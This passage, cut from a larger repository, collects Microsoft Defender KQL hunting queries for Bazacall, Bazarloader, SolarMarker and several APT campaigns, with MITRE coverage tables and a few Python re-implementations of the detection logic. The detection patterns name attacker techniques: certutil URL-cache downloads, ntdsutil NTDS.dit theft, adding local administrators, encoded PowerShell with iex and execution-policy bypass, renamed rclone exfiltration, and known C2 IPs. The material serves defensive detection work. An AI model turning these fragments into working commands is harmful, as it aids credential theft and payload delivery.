in (AbuseFeed) ) ``` ## Category This query can be used to detect the following attack 
techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | v | | | Defense evasion | | | | Credential Access | v | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Exploit | v | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | v | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Campaigns/Abusing settingcontent-ms.txt ================================================ // Sample query that search for .settingcontent-ms that has been downloaded from the web // through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook // For questions @MiladMSFT on Twitter or milad.aslaner@microsoft.com DeviceFileEvents | where InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe", "outlook.exe") | where FileName endswith ".settingcontent-ms" // The FileOrigin* columns are available only on Edge and Chrome and from Windows 10 version 1703 // https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454 | project Timestamp, DeviceName, FileName, FolderPath, FileOriginUrl, FileOriginReferrerUrl, FileOriginIP ================================================ FILE: Campaigns/Bazacall/Bazacall Emails.md ================================================ # Bazacall emails Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. 
These emails contain no links or attachments, and use automatic payment lures to trick users into contacting the number included in the email. ## Query This query looks for the subject lines associated with known Bazacall emails, using a regex to match on the fake account number pattern and a few keywords that are frequently used in these subjects. NOTE: Some emails contain the fake account number in the body of the email rather than the subject. In these instances, searching on keyword alone may surface related emails. Verify maliciousness by matching the regex for the account number in the body of the email if possible. ``` EmailEvents | where Subject matches regex @"[A-Z]{1,3}\d{9,15}" and Subject has_any('trial', 'free', 'demo', 'membership', 'premium', 'gold', 'notification', 'notice', 'claim', 'order', 'license', 'licenses') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Cobalt Strike Lateral Movement.md ================================================ # Bazacall Cobalt Strike Lateral Movement Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network. ## Query This query looks for alerts related to Cobalt Strike and its built-in PSExec used for lateral movement. 
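The service-binary name check of the query below, re-implemented in Python as an added example (not code from the repository), together with the AlertInfo-to-AlertEvidence join it is applied to. The alert ids, device names and file names are constructed. The example also makes two properties of the KQL explicit: `matches regex` is case-sensitive, and the second pattern, `[0-9]{1,5}`, is unanchored, so it only requires that the name contain at least one digit.

```python
import re

# Alert titles the query scopes to, exactly as written in the KQL.
CS_LATERAL_TITLES = {
    "File dropped and launched from remote location",
    "Suspicious transfer of an executable file",
}
# The two regexes from the query. KQL 'matches regex' is case-sensitive, so
# these are compiled without re.IGNORECASE to keep the same behaviour.
SEVEN_ALNUM_EXE = re.compile(r"^([a-z0-9]){7}\.exe$")
HAS_DIGIT = re.compile(r"[0-9]{1,5}")   # unanchored: {1,5} only requires at least one digit


def is_cs_psexec_service_name(file_name):
    """True for a 7-character lowercase alphanumeric .exe that contains a digit."""
    return bool(SEVEN_ALNUM_EXE.match(file_name)) and bool(HAS_DIGIT.search(file_name))


def lateral_movement_hits(alert_info, alert_evidence):
    """AlertInfo | where Title in (...) | join AlertEvidence on AlertId
       | where FileName matches both regexes."""
    in_scope = {a["AlertId"]: a for a in alert_info if a["Title"] in CS_LATERAL_TITLES}
    hits = []
    for ev in alert_evidence:
        alert = in_scope.get(ev["AlertId"])
        # Evidence rows for users, IPs etc. have no FileName; treat them as empty.
        if alert and is_cs_psexec_service_name(ev.get("FileName") or ""):
            hits.append({"AlertId": ev["AlertId"], "Title": alert["Title"],
                         "DeviceName": alert["DeviceName"], "FileName": ev["FileName"]})
    return hits


# Constructed rows; alert ids, device names and file names are hypothetical.
ALERT_INFO = [
    {"AlertId": "da1", "Title": "File dropped and launched from remote location", "DeviceName": "srv01"},
    {"AlertId": "da2", "Title": "Suspicious transfer of an executable file", "DeviceName": "srv02"},
    {"AlertId": "da3", "Title": "Suspicious PowerShell command line", "DeviceName": "ws01"},
]
ALERT_EVIDENCE = [   # one alert has several evidence rows: files, a user, ...
    {"AlertId": "da1", "EntityType": "File", "FileName": "f4a9c2e.exe"},
    {"AlertId": "da1", "EntityType": "File", "FileName": "PSEXESVC.exe"},  # Sysinternals PsExec service: 8 chars, uppercase
    {"AlertId": "da1", "EntityType": "User", "FileName": None},
    {"AlertId": "da2", "EntityType": "File", "FileName": "abcdefg.exe"},   # 7 chars but no digit
    {"AlertId": "da2", "EntityType": "File", "FileName": "3b7d0e9.exe"},
    {"AlertId": "da3", "EntityType": "File", "FileName": "9a8b7c6.exe"},   # alert title out of scope
]

if __name__ == "__main__":
    for hit in lateral_movement_hits(ALERT_INFO, ALERT_EVIDENCE):
        print(hit)
```

If the file names in your tenant's evidence are recorded with mixed case, prefix the first pattern with `(?i)` in both the KQL and the Python; as written, `F4A9C2E.exe` is not matched by either.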
``` AlertInfo | where Title in("File dropped and launched from remote location", "Suspicious transfer of an executable file") // Joining in instances where Cobalt Strike's built-in PsExec is used for lateral movement | join AlertEvidence on $left.AlertId == $right.AlertId | where FileName matches regex @"^([a-z0-9]){7}\.exe$" and FileName matches regex "[0-9]{1,5}" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Dropping payload via certutil.md ================================================ # BazaCall dropping payload via certutil.exe BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader. This query hunts for an attacker-created copy of *certutil.exe*, a legitimate process, which the macro uses to download BazaLoader.
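The two stages of this certutil chain as offline detection logic in Python, added here as an example and not code from the repository: stage 1 is the `excel.exe` spawning `mkdir ... && copy ... certutil.exe` pattern of the Excel Macro Execution query that follows this file, stage 2 is the renamed-copy download pattern of the query below, and the two are then linked by the name the macro gave its copy. The telemetry rows, paths, file names and URLs are constructed and hypothetical; `has_all` here only approximates Kusto's case-insensitive whole-term matching.

```python
import re


def terms(text):
    """Approximate KQL term tokenization: lowercase alphanumeric runs."""
    return re.findall(r"[a-z0-9]+", text.lower())


def has_all(text, *needles):
    """Approximate KQL has_all(): every needle's terms occur as whole terms in text.
    Whole-term matching is why 'http' matches the scheme of http:// but not https://."""
    toks = set(terms(text))
    return all(all(t in toks for t in terms(needle)) for needle in needles)


COPY_DEST = re.compile(r"copy\s+\S*certutil\.exe\s+(\S+)", re.IGNORECASE)


def excel_macro_stage(process_events):
    """Stage 1 (Excel Macro Execution query): excel.exe spawning
    'mkdir ... && copy ... certutil.exe ...'. Records the name given to the copy."""
    hits = []
    for ev in process_events:
        cmd = ev["ProcessCommandLine"]
        if ev["InitiatingProcessFileName"].lower() == "excel.exe" and \
                has_all(cmd, "mkdir", "&& copy", "certutil.exe"):
            m = COPY_DEST.search(cmd)
            copy_name = m.group(1).rsplit("\\", 1)[-1].lower() if m else None
            hits.append({**ev, "CertutilCopyName": copy_name})
    return hits


def renamed_certutil_stage(file_events):
    """Stage 2 (Dropping payload via certutil query): a file written by a process
    that is NOT named certutil.exe or cmd.exe but carries certutil's download flags."""
    return [ev for ev in file_events
            if ev["InitiatingProcessFileName"].lower() not in ("certutil.exe", "cmd.exe")
            and has_all(ev["InitiatingProcessCommandLine"], "-urlcache", "split", "http")]


def link_chain(stage1, stage2):
    """Pair each stage-2 download with the stage-1 copy that created its binary
    (same device, initiating file name equals the copy destination's base name)."""
    return [(s1["ProcessCommandLine"], s2["InitiatingProcessCommandLine"], s2["FileName"])
            for s1 in stage1 for s2 in stage2
            if s1["DeviceName"] == s2["DeviceName"]
            and s2["InitiatingProcessFileName"].lower() == s1["CertutilCopyName"]]


# Constructed telemetry rows; paths, names and URLs are hypothetical.
PROCESS_EVENTS = [
    {"DeviceName": "ws01", "InitiatingProcessFileName": "EXCEL.EXE",
     "ProcessCommandLine": r"cmd.exe /c mkdir C:\Users\Public\Temp && copy "
                           r"C:\Windows\System32\certutil.exe C:\Users\Public\Temp\update.exe"},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "excel.exe",
     "ProcessCommandLine": r"cmd.exe /c mkdir C:\Users\Public\Temp"},           # no certutil copy
]
FILE_EVENTS = [
    {"DeviceName": "ws01", "InitiatingProcessFileName": "update.exe", "FileName": "a.dll",  # the renamed copy
     "InitiatingProcessCommandLine": r"C:\Users\Public\Temp\update.exe -urlcache -split -f "
                                     r"http://example.invalid/cancel.php C:\Users\Public\Temp\a.dll"},
    {"DeviceName": "ws03", "InitiatingProcessFileName": "certutil.exe", "FileName": "b.dll",  # real name: out of scope
     "InitiatingProcessCommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/b C:\b.dll"},
    {"DeviceName": "ws01", "InitiatingProcessFileName": "cmd.exe", "FileName": "c.dll",  # cmd.exe: excluded
     "InitiatingProcessCommandLine": r"cmd.exe /c C:\Users\Public\Temp\update.exe -urlcache -split -f "
                                     r"http://example.invalid/c C:\c.dll"},
    {"DeviceName": "ws04", "InitiatingProcessFileName": "update.exe", "FileName": "d.dll",  # https: 'http' is not a whole term
     "InitiatingProcessCommandLine": r"C:\Users\Public\Temp\update.exe -urlcache -split -f "
                                     r"https://example.invalid/d C:\d.dll"},
]

if __name__ == "__main__":
    for macro_cmd, download_cmd, dropped in link_chain(excel_macro_stage(PROCESS_EVENTS),
                                                       renamed_certutil_stage(FILE_EVENTS)):
        print("macro:", macro_cmd, "\ndownload:", download_cmd, "\ndropped:", dropped)
```

Two things worth checking when you run the real query: `has`/`has_all` match whole terms, so the term `http` does not match the scheme of an `https://` URL (the constructed ws04 row shows the gap; add a second `has_all` with `https`, or match on `-urlcache` and `split` alone, if you want both schemes), and the name filter is what scopes the hunt to a renamed copy, so a download by the genuine `certutil.exe` is intentionally outside it.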
## Query

```kusto
DeviceFileEvents
| where InitiatingProcessFileName !~ "certutil.exe"
| where InitiatingProcessFileName !~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("-urlcache", "split", "http")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazacall/Excel Macro Execution.md
================================================

# Bazacall Excel Macro Execution

Bazacall uses malicious macro-enabled Excel documents to execute its payload.

## Query

This query looks for the malicious macro being executed on a machine.

```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "excel.exe" and ProcessCommandLine has_all('mkdir', '&& copy', 'certutil.exe')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazacall/Excel file download domain pattern.md
================================================

# BazaCall Excel file download domain pattern

BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader.

This query surfaces connections to the distinctive *.xyz* domains that the BazaCall campaign uses to host malicious Excel files.

## Query

```kusto
DeviceNetworkEvents
| where RemoteUrl matches regex @".{14}\.xyz/config\.php"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazacall/Malicious Excel Delivery.md
================================================

# Bazacall Malicious Excel Delivery

Bazacall uses malicious Excel files to execute payloads on affected devices.

## Query

This query looks for files that are downloaded from URL paths known to be associated with the Bazacall threat.

```
DeviceFileEvents
| where (FileOriginUrl has "/cancel.php" and FileOriginReferrerUrl has "/account")
    or (FileOriginUrl has "/download.php" and FileOriginReferrerUrl has "/case")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazacall/NTDS theft.md
================================================

# Bazacall NTDS.dit Theft

Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.

## Query

This query looks for copies of NTDS created in specific file paths known to be associated with the Bazacall threat.

```
DeviceProcessEvents
| where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any("full", "fu")
| where ProcessCommandLine has_any ("temp", "perflogs", "programdata")
// Exclusion
| where ProcessCommandLine !contains @"Backup"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazacall/Renamed Rclone Exfil.md
================================================

# Bazacall Renamed Rclone for Exfiltration

Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.

## Query

This query looks for Rclone being renamed to be used for data exfiltration.

```
DeviceProcessEvents
| where ProcessVersionInfoProductName has "rclone" and not(FileName has "rclone")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazacall/RunDLL Suspicious Network Connection.md
================================================

# RunDLL Suspicious Network Connections

During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains a specific process parameter, ",GlobalOut", that can surface potentially malicious activity related to Bazacall and Bazaloader.

## Query

This query looks for network connection events made by the RunDll32.exe process that have a command line containing the ",GlobalOut" process parameter.

```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ 'rundll32.exe' and InitiatingProcessCommandLine has ",GlobalOut"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazarloader/Stolen Images Execution.md
================================================

# Stolen Images

The "Stolen Images" Bazarloader campaign uses fake copyright infringement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.

## Query

This query looks for instances of Wscript being used to execute the malicious "stolen images" file associated with this Bazarloader campaign.

```
DeviceProcessEvents
| where FileName =~ "wscript.exe" and ProcessCommandLine has_all("stolen", "images")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazarloader/Zip-Doc - Creation of JPG Payload File.md
================================================

# Zip-Doc - Creation of JPG Payload File

In the campaign where Bazarloader is delivered via emails containing password-protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.

## Query

This query looks for instances of regsvr32.exe launching a file with a .jpg extension and summarizes the file name, SHA256, and Device ID for easy analysis.

```
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "regsvr32.exe" and InitiatingProcessCommandLine has ".jpg" and FileName endswith ".jpg"
| summarize by FileName, SHA256, DeviceId, bin(Timestamp, 1d)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bazarloader/Zip-Doc - Word Launching MSHTA.md
================================================

# Zip-Doc - Word Launching MSHTA

The password-protected zip attachment -> Word document delivery method of Bazarloader uses Word to create an .hta file and launch it via MSHTA, which connects to a malicious domain and pulls down the Bazarloader payload.

## Query

This query looks for instances of Microsoft Word creating an .hta file.

```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'WINWORD.EXE' and FileName =~ 'cmd.exe' and ProcessCommandLine has_all('hta')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Bear Activity GTR 2019.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FileName =~ "xcopy.exe" and ProcessCommandLine has @" /S /E /C /Q /H \")
    or (FileName =~ "adexplorer.exe" and ProcessCommandLine has @" -snapshot """" c:\users\")
| top 100 by Timestamp desc

================================================
FILE: Campaigns/Cloud Hopper.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ @"cscript.exe" and ProcessCommandLine has ".vbs /shell "
| top 100 by Timestamp desc

================================================
FILE: Campaigns/DofoilNameCoinServerTraffic.txt
================================================

// This query retrieves the last 30 days of network connections to known Dofoil NameCoin servers
// The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/
DeviceNetworkEvents
| where RemoteIP in (
"139.59.208.246","130.255.73.90","31.3.135.232","52.174.55.168","185.121.177.177","185.121.177.53",
"62.113.203.55","144.76.133.38","169.239.202.202","5.135.183.146","142.0.68.13","103.253.12.18",
"62.112.8.85","69.164.196.21","107.150.40.234","162.211.64.20","217.12.210.54","89.18.27.34",
"193.183.98.154","51.255.167.0","91.121.155.13","87.98.175.85","185.97.7.7")
| project DeviceName, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort

================================================
FILE: Campaigns/Dopplepaymer In-Memory Malware Implant.txt
================================================

///////////////////////////////////////////////////////////////////
// Dopplepaymer In-Memory Malware Implant
//
// This query identifies processes with command line launch strings
// which match the pattern used in Dopplepaymer ransomware attacks.
///////////////////////////////////////////////////////////////////
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine startswith "-q -s {{" and ProcessCommandLine contains "}} -p "

================================================
FILE: Campaigns/Dragon Fly.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "crackmapexec.exe"
| top 100 by Timestamp desc

================================================
FILE: Campaigns/Elise backdoor.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FolderPath =~ @"C:\Windows\SysWOW64\cmd.exe" and ProcessCommandLine has @"\Windows\Caches\NavShExt.dll")
    or (ProcessCommandLine endswith @"\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting")
| top 100 by Timestamp desc

================================================
FILE: Campaigns/Equation Group C2 Communication.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FolderPath endswith @"\rundll32.exe" and ProcessCommandLine endswith ",dll_u")
    or ProcessCommandLine has " -export dll_u "
| top 100 by Timestamp desc

================================================
FILE: Campaigns/Hurricane Panda activity.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith " localgroup administrators admin /add" or ProcessCommandLine has @"\Win64.exe"
| top 100 by Timestamp desc

================================================
FILE: Campaigns/Judgement Panda exfil activity.txt
================================================

// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has @"\ldifde.exe -f -n "
    or ProcessCommandLine has @"\7za.exe a 1.7z "
    or ProcessCommandLine endswith @" eprod.ldf"
    or ProcessCommandLine has @"\aaaa\procdump64.exe"
    or ProcessCommandLine has @"\aaaa\netsess.exe"
    or ProcessCommandLine has @"\aaaa\7za.exe"
    or ProcessCommandLine has @"copy .\1.7z \"
    or ProcessCommandLine has @"copy \client\c$\aaaa\"
    or FolderPath == @"C:\Users\Public\7za.exe"
| top 100 by Timestamp desc

================================================
FILE: Campaigns/Jupyter-Solarmaker/deimos-component-execution.md
================================================

# Jupyter AKA SolarMarker

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities. It proliferates mainly through search engine optimization manipulation and malicious advertising in order to encourage users to download malicious templates and documents. This malware has been popular since 2020 and is still active as of 2021.

# Deimos malware component execution

The following query checks specifically for the AMSI Script Content signaling that the Deimos malware is loading for execution. This is most often seen loaded by Jupyter, but may accompany other malware or Jupyter variants as well.

## Query

```
DeviceEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where ActionType == "AmsiScriptContent"
| where AdditionalFields endswith '[mArS.deiMos]::inteRaCt()"}'
| project InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, ActionType, AdditionalFields
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | v | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-executions.md
================================================

# Jupyter AKA SolarMarker

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities. It proliferates mainly through search engine optimization manipulation and malicious advertising in order to encourage users to download malicious templates and documents. This malware has been popular since 2020 and is still active as of 2021.

# Jupyter's evasive PowerShell executions

The following query checks for instances of Jupyter or SolarMarker malware that launch a lengthy PowerShell script, which in turn reads from encoded strings to parse the next malicious script. The initiating process name for this will almost always end in ".tmp" and reflect the original downloaded executable name.

## Query

```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all ("-command","FromBase64String","));remove-item $",".length;$j++){$","$i++;if($i -ge $","-bxor","UTF8.GetString")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-strings.md
================================================

# Evasive PowerShell with uncommon read strings

This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query is not fully specific to Jupyter or SolarMarker and will also return other malware, but is unlikely to return false positives.

## Query

```
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_all("-ep bypass","-command","get-content","remove-item","iex")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/Jupyter-Solarmaker/successive-tk-domain-calls.md
================================================

# Jupyter AKA SolarMarker

